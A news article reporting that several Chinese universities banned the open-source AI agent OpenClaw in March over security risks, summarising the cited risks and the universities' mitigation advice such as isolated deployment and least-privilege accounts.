Universities Issue Campus-Wide Ban on March 10
Multiple Chinese universities have moved to prohibit the use of the open-source AI agent OpenClaw, citing critical security vulnerabilities. On March 10, Zhuhai University of Science and Technology issued a formal notice strictly banning the installation and use of OpenClaw, its derivatives, and related plugins on all campus equipment and networks. The university mandated the immediate and complete uninstallation of the software, warning that it would conduct network scans and hold individuals accountable for any resulting security incidents or data breaches.
This action was not isolated. Anhui Normal University released a similar security alert on March 10, followed by Jiangsu Normal University on March 11. These institutions warned faculty and students about the significant dangers posed by the AI tool, reflecting a coordinated response to a directive from national cybersecurity authorities.
Four Core Security Risks Drive Institutional Action
The university directives follow a security bulletin from China's Ministry of Industry and Information Technology's cybersecurity platform. The warnings center on four primary risks inherent in OpenClaw, particularly when used with default or improper configurations. Anhui Normal University detailed these threats, which underpin the widespread campus bans.
The first risk is extreme privacy exposure, as the tool requires high-level system permissions and stores sensitive data—including chat logs, account passwords, and emails—in unsecured plaintext files. The second is a high potential for uncontrolled autonomous execution, where the agent has been observed misinterpreting commands and performing destructive actions like deleting important files. Third, vague permission boundaries create vulnerabilities for malicious takeovers, allowing attackers to gain remote control of a user's system. Finally, the tool's design as a developer framework makes it unsuitable for ordinary users, who may amplify security risks through improper configuration, especially when using unofficial installation services.
Mitigation Guidelines Mandate Isolated Environments
For users who still choose to engage with the software, universities have provided strict risk mitigation protocols. Jiangsu Normal University advised that any deployment of OpenClaw must occur in isolated environments such as a cloud server, virtual machine, or container. It explicitly stated that the service should never be exposed to public or campus networks.
Furthermore, the university stressed the importance of using minimum necessary permissions instead of administrator accounts and requiring secondary confirmation for critical operations like deleting files or modifying system configurations. A final warning was issued regarding community-provided plugins or "skills," which could be "poisoned" with malicious code. Users were urged to inspect all code before installation and reject any package requiring downloads of compressed files or the execution of shell scripts.
